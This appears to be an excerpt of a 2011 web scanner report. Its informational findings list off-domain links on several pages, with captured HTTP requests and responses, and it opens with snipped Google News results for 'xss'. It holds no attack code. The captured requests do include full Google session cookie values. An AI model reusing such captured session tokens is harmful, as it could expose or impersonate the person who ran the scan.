<h2 class="title"><a target="_self" class="usg-AFQjCNFECoXjVuGXmlIpItfJKE2Ppg9zxw did-1c4b63fa999851a7 article" href="http://www.zataz.com/news/21188/sony--xss--cross-site-scripting.html" id=""><span class="titletext">
...[SNIP]...
<p class="title"><a target="_self" class="usg-AFQjCNFECoXjVuGXmlIpItfJKE2Ppg9zxw did-1c4b63fa999851a7 article" href="http://www.zataz.com/news/21188/sony--xss--cross-site-scripting.html" id=""><span class="titletext">
...[SNIP]...
<td class="center-image"><a target="_self" href="http://www.biobiochile.cl/2011/05/02/vulnerabilidades-en-sitios-webs-bancarios-facilitaria-el-phishing.shtml" class="usg-AFQjCNFweRNT3Mizw49I5dFcVQ7sUqKkSg did-ffe85710f3286b55 article"><img alt="" src="http://nt0.ggpht.com/news/tbn/ANo1n5tGttMYUM/1.jpg"></a>
...[SNIP]...
<h2 class="title"><a target="_self" class="usg-AFQjCNFweRNT3Mizw49I5dFcVQ7sUqKkSg did-ffe85710f3286b55 article" href="http://www.biobiochile.cl/2011/05/02/vulnerabilidades-en-sitios-webs-bancarios-facilitaria-el-phishing.shtml" id=""><span class="titletext">
...[SNIP]...
<p class="title"><a target="_self" class="usg-AFQjCNFweRNT3Mizw49I5dFcVQ7sUqKkSg did-ffe85710f3286b55 article" href="http://www.biobiochile.cl/2011/05/02/vulnerabilidades-en-sitios-webs-bancarios-facilitaria-el-phishing.shtml" id=""><span class="titletext">
...[SNIP]...
<td class="center-image"><a target="_self" href="http://www.lavozdeasturias.es/asturias/oviedo/Manual-asalto-hacker_0_467353300.html" class="usg-AFQjCNGm6m_GDV8z4NpQxXkLHTumTBH7ug did-9b0b5946a2acfab7 article"><img alt="" src="http://nt1.ggpht.com/news/tbn/PQ-bGjxtzs5UNM/1.jpg"></a>
...[SNIP]...
<h2 class="title"><a target="_self" class="usg-AFQjCNGm6m_GDV8z4NpQxXkLHTumTBH7ug did-9b0b5946a2acfab7 article" href="http://www.lavozdeasturias.es/asturias/oviedo/Manual-asalto-hacker_0_467353300.html" id=""><span class="titletext">
...[SNIP]...
<p class="title"><a target="_self" class="usg-AFQjCNGm6m_GDV8z4NpQxXkLHTumTBH7ug did-9b0b5946a2acfab7 article" href="http://www.lavozdeasturias.es/asturias/oviedo/Manual-asalto-hacker_0_467353300.html" id=""><span class="titletext">
...[SNIP]...
<td class="center-image"><a target="_self" href="http://www.20minutos.es/noticia/1038965/0/firefox/novedades/versiones/" class="usg-AFQjCNHfixZm65w0khO9efxJtfgE-hVlFg did-e6ed13c112e75f58 article"><img alt="" src="http://nt1.ggpht.com/news/tbn/kUf4A8oelEE3mM/1.jpg"></a>
...[SNIP]...
<h2 class="title"><a target="_self" class="usg-AFQjCNHfixZm65w0khO9efxJtfgE-hVlFg did-e6ed13c112e75f58 article" href="http://www.20minutos.es/noticia/1038965/0/firefox/novedades/versiones/" id=""><span class="titletext">
...[SNIP]...
<p class="title"><a target="_self" class="usg-AFQjCNHfixZm65w0khO9efxJtfgE-hVlFg did-e6ed13c112e75f58 article" href="http://www.20minutos.es/noticia/1038965/0/firefox/novedades/versiones/" id=""><span class="titletext">
...[SNIP]...
<td class="center-image"><a target="_self" href="http://www.peru.com/noticias/portada20110426/148881/Conozca-cual-es-el-objetivo-real-del-virus-de-Facebook---" class="usg-AFQjCNGjaZk5icny18RLw9ARNu3-eJNg1A did-f827e915a63c6a2b article"><img alt="" src="http://nt1.ggpht.com/news/tbn/NccJbJ641jl0qM/1.jpg"></a>
...[SNIP]...
<h2 class="title"><a target="_self" class="usg-AFQjCNGjaZk5icny18RLw9ARNu3-eJNg1A did-f827e915a63c6a2b article" href="http://www.peru.com/noticias/portada20110426/148881/Conozca-cual-es-el-objetivo-real-del-virus-de-Facebook---" id=""><span class="titletext">
...[SNIP]...
<p class="title"><a target="_self" class="usg-AFQjCNGjaZk5icny18RLw9ARNu3-eJNg1A did-f827e915a63c6a2b article" href="http://www.peru.com/noticias/portada20110426/148881/Conozca-cual-es-el-objetivo-real-del-virus-de-Facebook---" id=""><span class="titletext">
...[SNIP]...
<td class="center-image"><a target="_self" href="http://www.vedomosti.ru/newsline/news/1259716/androidsmartfony_otsylayut_koordinaty_polzovatelya_v_google" class="usg-AFQjCNEIpNv8DfbCr5FR2UucZrWSb_H8YA did-b9d4719504666f25 article"><img alt="" src="http://nt3.ggpht.com/news/tbn/t5y84RQOceJuEM/1.jpg"></a>
...[SNIP]...
<h2 class="title"><a target="_self" class="usg-AFQjCNEIpNv8DfbCr5FR2UucZrWSb_H8YA did-b9d4719504666f25 article" href="http://www.vedomosti.ru/newsline/news/1259716/androidsmartfony_otsylayut_koordinaty_polzovatelya_v_google" id=""><span class="titletext">
...[SNIP]...
<p class="title"><a target="_self" class="usg-AFQjCNEIpNv8DfbCr5FR2UucZrWSb_H8YA did-b9d4719504666f25 article" href="http://www.vedomosti.ru/newsline/news/1259716/androidsmartfony_otsylayut_koordinaty_polzovatelya_v_google" id=""><span class="titletext">
...[SNIP]...
<a onclick="return false;" href="javascript:void(0);"><img class="icon home-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">
Make Google News my homepage</a>
...[SNIP]...
<a href="http://news.google.com/news?pz=1&cf=i&ned=us&hl=en&q=xss&cf=i&output=rss"><img class="icon feed-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">RSS</a>
...[SNIP]...
</a> - <a href="http://googlenewsblog.blogspot.com/">Blog</a>
...[SNIP]...

18.14. http://www.911enable.com/business/contact_specialist.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.911enable.com
Path:	/business/contact_specialist.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.911enable.com/business/contact_specialist.php?provenance=empty

The response contains the following links to other domains:

http://images.scanalert.com/meter/www.911enable.com/12.gif
http://www.e911buzz.com/
https://support.connexon.com/
https://www.scanalert.com/RatingVerify?ref=www.911enable.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=r2burfmm6jqje8vo1bf8orrin2; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa OUR BUS PHY COM NAV INT STA"
Server: 911Enable LA-5
Date: Thu, 12 May 2011 01:07:16 GMT
Content-Length: 23673

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><!-- InstanceBegin template="/Tem
...[SNIP]...
<img src="/images/topmenu_spacer.gif"/>
<a href="https://support.connexon.com">Support</a>
...[SNIP]...
</div>
<a href="http://www.e911buzz.com" onClick="javascript: pageTracker._trackPageview ('./blog/e911buzz.php');" target="_blank" title="Visit the 911 Enable E911 Blog"> <img style="margin-left:10px; margin-top:20px; margin-bottom:15px; border:none;" src="/images/e911buzz_blog.png" alt="911 Enable E911 Blog E911 Buzz Logo" title="Visit the 911 Enable E911 Blog" />
...[SNIP]...
<div id="scanalert"><a href="https://www.scanalert.com/RatingVerify?ref=www.911enable.com"><img width="115" height="32" src="//images.scanalert.com/meter/www.911enable.com/12.gif" alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime." style="border:none;" /></a>
...[SNIP]...

18.15. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.job-search-engine.com%2F&layout=standard&show_faces=false&width=315&action=like&font=verdana&colorscheme=light&height=35

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js
http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/HD3OAbjOVTn.css

Request

Response

18.16. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=scanmedios

The response contains the following links to other domains:

http://content.scanmedios.com/
http://foontic.net/www.scanmedios.com
http://forums.webproxytalk.com/2098-scanmedios.html
http://scanmedios.com.hypestat.com/
http://webcache.googleusercontent.com/search?q=cache:2PBAhcDj47MJ:foontic.net/www.scanmedios.com+scanmedios&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:C3zMO3GPqAYJ:forums.webproxytalk.com/2098-scanmedios.html+scanmedios&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:GvlOlLFyyRIJ:www.siteslike.com/similar/scanmedios.com+scanmedios&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:Ie-MjeRtXT4J:www.markosweb.com/www/scanmedios.com/+scanmedios&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:PqCG498sTLEJ:scanmedios.com.hypestat.com/+scanmedios&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:ZtSPSQmgh_oJ:www.killerstartups.com/eCommerce/scanmedios-com-global-internet-ad-network+scanmedios&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:cmcaCnzxmXMJ:www.xomreviews.com/scanmedios.com+scanmedios&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:t3mVHetNSfIJ:www.ip-adress.com/whois/scanmedios.com+scanmedios&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com
http://whois.domaintools.com/scanmedios.com
http://www.ip-adress.com/whois/scanmedios.com
http://www.killerstartups.com/eCommerce/scanmedios-com-global-internet-ad-network
http://www.markosweb.com/www/scanmedios.com/
http://www.siteslike.com/similar/scanmedios.com
http://www.xomreviews.com/scanmedios.com
http://www.youtube.com/results?q=scanmedios&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?sourceid=chrome&ie=UTF-8&q=scanmedios HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:37:54 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 76634

<!doctype html> <head> <title>scanmedios - Google Search</title> <script>window.google={kEI:"8jnLTbDONuLL0QGwzvz4Bw",kEXPI:"17259,24472,25907,27147,28505,28766,28887,29229,29509,29685,29795,298
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=scanmedios&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.killerstartups.com/eCommerce/scanmedios-com-global-internet-ad-network" class=l onmousedown="return clk(this.href,'','','','1','','0CBYQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ZtSPSQmgh_oJ:www.killerstartups.com/eCommerce/scanmedios-com-global-internet-ad-network+scanmedios&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CB0QIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.ip-adress.com/whois/scanmedios.com" class=l onmousedown="return clk(this.href,'','','','2','','0CB8QFjAB')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:t3mVHetNSfIJ:www.ip-adress.com/whois/scanmedios.com+scanmedios&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CCQQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://whois.domaintools.com/scanmedios.com" class=l onmousedown="return clk(this.href,'','','','3','','0CCUQFjAC')"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.xomreviews.com/scanmedios.com" class=l onmousedown="return clk(this.href,'','','','4','','0CCsQFjAD')">Mediosone (www <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:cmcaCnzxmXMJ:www.xomreviews.com/scanmedios.com+scanmedios&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CDAQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.markosweb.com/www/scanmedios.com/" class=l onmousedown="return clk(this.href,'','','','5','','0CDIQFjAE')">www.<em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Ie-MjeRtXT4J:www.markosweb.com/www/scanmedios.com/+scanmedios&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CDcQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://content.scanmedios.com/" class=l onmousedown="return clk(this.href,'','','','6','','0CDgQFjAF')">content.scanmedios.com/</a>
...[SNIP]...
<h3 class="r"><a href="http://forums.webproxytalk.com/2098-scanmedios.html" class=l onmousedown="return clk(this.href,'','','','7','','0CDoQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:C3zMO3GPqAYJ:forums.webproxytalk.com/2098-scanmedios.html+scanmedios&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CEMQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://scanmedios.com.hypestat.com/" class=l onmousedown="return clk(this.href,'','','','8','','0CEQQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:PqCG498sTLEJ:scanmedios.com.hypestat.com/+scanmedios&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CEkQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.siteslike.com/similar/scanmedios.com" class=l onmousedown="return clk(this.href,'','','','9','','0CEoQFjAI')">Sites Like <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:GvlOlLFyyRIJ:www.siteslike.com/similar/scanmedios.com+scanmedios&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CE8QIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://foontic.net/www.scanmedios.com" class=l onmousedown="return clk(this.href,'','','','10','','0CFAQFjAJ')">www.<em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:2PBAhcDj47MJ:foontic.net/www.scanmedios.com+scanmedios&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CFUQIDAJ')">Cached</a>
...[SNIP]...

18.17. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=number+porting+lnp

The response contains the following links to other domains:

http://en.wikipedia.org/wiki/Local_number_portability
http://webcache.googleusercontent.com/search?q=cache:AkKZNgpdNG8J:www.ported.com/midlnp.htm+number+porting+lnp&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:QL8BYk-aK2gJ:www.wirelessadvisor.com/wireless-local-number-portability+number+porting+lnp&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:WuKPOPqfSOsJ:www.8x8.com/Resources/Learn/TransferringNumber.aspx+number+porting+lnp&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:ZYrUCwFnXw4J:www.inphonex.com/services/local-number-portability.php+number+porting+lnp&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:d4Eb8aOz6OAJ:en.wikipedia.org/wiki/Local_number_portability+number+porting+lnp&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:jOPjUbcq1MIJ:www.wireless.att.com/cell-phone-service/transfer-your-number/index.jsp+number+porting+lnp&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:rQHXqJ79c8YJ:www.varphonex.com/services/local-number-portability.php+number+porting+lnp&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:s1CZWP6-YAwJ:www.voip-info.org/index.php%3Fcontent_id%3D4313+number+porting+lnp&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:x6NviN5neVgJ:www.qwest.com/wholesale/pcat/lnp.html+number+porting+lnp&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:yIjYu4_V-NMJ:www.fcc.gov/cgb/NumberPortability/+number+porting+lnp&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com
http://www.8x8.com/Resources/Learn/TransferringNumber.aspx
http://www.fcc.gov/cgb/NumberPortability/
http://www.fcc.gov/cgb/NumberPortability/lnpwaiverpetitions.html
http://www.fcc.gov/cib/consumerfacts/numbport.html
http://www.inphonex.com/services/local-number-portability.php
http://www.ported.com/midlnp.htm
http://www.qwest.com/wholesale/pcat/lnp.html
http://www.varphonex.com/services/local-number-portability.php
http://www.voip-info.org/index.php?content_id=4313
http://www.wireless.att.com/cell-phone-service/transfer-your-number/index.jsp
http://www.wirelessadvisor.com/wireless-local-number-portability
http://www.youtube.com/results?q=number+porting+lnp&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?sourceid=chrome&ie=UTF-8&q=number+porting+lnp HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=THnvL1Oo2rFB1EyPuENlypklsUgiuRDrggMizX7GcvuSEWk1O1BRhP0HMsig4_tUMgrpgSA4JfKinmjR9Q08mpbqo9YLMeQa1bwUSS3rWNSNQKH_51QqwF1Bj_TupkUW

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:43:57 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/vD843DpA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 81764

<!doctype html> <head> <title>number porting lnp - Google Search</title> <script>window.google={kEI:"TS3LTaDUOqXc0QGA0fSXCQ",kEXPI:"17259,24472,25907,27147,28505,28766,28887,29229,29509,29685,2
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=number+porting+lnp&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Local_number_portability" class=l onmousedown="return clk(this.href,'','','','1','','0CCAQFjAA')"><em>
...[SNIP]...
<div class=osl><a href="http://en.wikipedia.org/wiki/Local_number_portability#History" onmousedown="return clk(this.href,'','','','1','','0CCcQ0gIoADAA')">History</a> - <a href="http://en.wikipedia.org/wiki/Local_number_portability#Portability_schemes" onmousedown="return clk(this.href,'','','','1','','0CCgQ0gIoATAA')">Portability schemes</a> - <a href="http://en.wikipedia.org/wiki/Local_number_portability#Technical_issues" onmousedown="return clk(this.href,'','','','1','','0CCkQ0gIoAjAA')">Technical issues</a> - <a href="http://en.wikipedia.org/wiki/Local_number_portability#Portability_by_country" onmousedown="return clk(this.href,'','','','1','','0CCoQ0gIoAzAA')">Portability by country</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:d4Eb8aOz6OAJ:en.wikipedia.org/wiki/Local_number_portability+number+porting+lnp&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CCUQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.fcc.gov/cgb/NumberPortability/" class=l onmousedown="return clk(this.href,'','','','2','','0CCwQFjAB')"><em>
...[SNIP]...
<div class=osl><a href="http://www.fcc.gov/cib/consumerfacts/numbport.html" onmousedown="return clk(this.href,'','','','2','','0CDMQ0gIoADAB')">Your Telephone Number When You ...</a> - <a href="http://www.fcc.gov/cgb/NumberPortability/lnpwaiverpetitions.html" onmousedown="return clk(this.href,'','','','2','','0CDQQ0gIoATAB')">LNP Waiver Petitions & Decisions</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:yIjYu4_V-NMJ:www.fcc.gov/cgb/NumberPortability/+number+porting+lnp&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CDEQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.wireless.att.com/cell-phone-service/transfer-your-number/index.jsp" class=l onmousedown="return clk(this.href,'','','','3','','0CDYQFjAC')">Transfer your <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:jOPjUbcq1MIJ:www.wireless.att.com/cell-phone-service/transfer-your-number/index.jsp+number+porting+lnp&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CDsQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.wirelessadvisor.com/wireless-local-number-portability" class=l onmousedown="return clk(this.href,'','','','4','','0CD0QFjAD')">Wireless <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:QL8BYk-aK2gJ:www.wirelessadvisor.com/wireless-local-number-portability+number+porting+lnp&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CEIQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.qwest.com/wholesale/pcat/lnp.html" class=l onmousedown="return clk(this.href,'','','','5','','0CEQQFjAE')">Qwest | Wholesale | Local <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:x6NviN5neVgJ:www.qwest.com/wholesale/pcat/lnp.html+number+porting+lnp&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CEkQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.inphonex.com/services/local-number-portability.php" class=l onmousedown="return clk(this.href,'','','','6','','0CEsQFjAF')">InPhonex Local <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ZYrUCwFnXw4J:www.inphonex.com/services/local-number-portability.php+number+porting+lnp&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CFAQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.voip-info.org/index.php?content_id=4313" class=l onmousedown="return clk(this.href,'','','','7','','0CFIQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:s1CZWP6-YAwJ:www.voip-info.org/index.php%3Fcontent_id%3D4313+number+porting+lnp&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:s1CZWP6-YAwJ:www.voip-info.org/index.php%3Fcontent_id%3D4313+number+porting+lnp&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com','','','','7','','0CFcQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.ported.com/midlnp.htm" class=l onmousedown="return clk(this.href,'','','','8','','0CFgQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:AkKZNgpdNG8J:www.ported.com/midlnp.htm+number+porting+lnp&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CF0QIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.8x8.com/Resources/Learn/TransferringNumber.aspx" class=l onmousedown="return clk(this.href,'','','','9','','0CF8QFjAI')">VoIP Transfer <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:WuKPOPqfSOsJ:www.8x8.com/Resources/Learn/TransferringNumber.aspx+number+porting+lnp&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CGQQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.varphonex.com/services/local-number-portability.php" class=l onmousedown="return clk(this.href,'','','','10','','0CGYQFjAJ')">Local <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:rQHXqJ79c8YJ:www.varphonex.com/services/local-number-portability.php+number+porting+lnp&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CGsQIDAJ')">Cached</a>
...[SNIP]...

18.18. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=7&ved=0CFQQFjAG&url=http%3A%2F%2Fwww.virtual-phone-number.org%2Findex.php%3Ftitle%3DLocal_Number_Portability_(LNP)%26redirect%3Dno&ei=mS3LTaatBIXc0QHL49DbCA&usg=AFQjCNFZvt6UMgHLMTLnnquQ4-rgdrUR2Q

The response contains the following link to another domain:

http://www.virtual-phone-number.org/index.php?title=Local_Number_Portability_(LNP)&redirect=no

Request

GET /url?sa=t&source=web&cd=7&ved=0CFQQFjAG&url=http%3A%2F%2Fwww.virtual-phone-number.org%2Findex.php%3Ftitle%3DLocal_Number_Portability_(LNP)%26redirect%3Dno&ei=mS3LTaatBIXc0QHL49DbCA&usg=AFQjCNFZvt6UMgHLMTLnnquQ4-rgdrUR2Q HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 302 Found
Location: http://www.virtual-phone-number.org/index.php?title=Local_Number_Portability_(LNP)&redirect=no
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 00:46:07 GMT
Server: gws
Content-Length: 295
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.virtual-phone-number.org/index.php?title=Local_Number_Portability_(LNP)&redirect=no">here</A>
...[SNIP]...

18.19. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=8&ved=0CFoQFjAH&url=http%3A%2F%2Fnetvoipcommunications.com%2Fadditional-services.html&ei=mS3LTaatBIXc0QHL49DbCA&usg=AFQjCNGfl5B0e2HD7DpZKbBuz_TUyCMMlQ

The response contains the following link to another domain:

http://netvoipcommunications.com/additional-services.html

Request

